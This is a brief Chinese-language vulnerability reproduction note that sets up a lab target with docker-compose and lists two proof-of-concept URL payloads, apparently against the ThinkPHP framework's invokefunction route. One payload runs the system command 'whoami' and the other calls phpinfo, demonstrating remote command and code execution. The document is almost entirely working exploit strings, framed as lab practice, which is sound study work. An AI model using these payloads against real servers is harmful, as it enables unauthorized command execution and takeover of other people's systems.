环境配置
云服务器:47.113.231.0:8080
docker-compose up -d #启动环境
漏洞复现
1.访问靶场:http://47.113.231.0:8080/
2.远程命令执⾏
POC:
?
s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]
[]=whoami
3.远程代码执行
POC:
?
s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[
1][]=-1
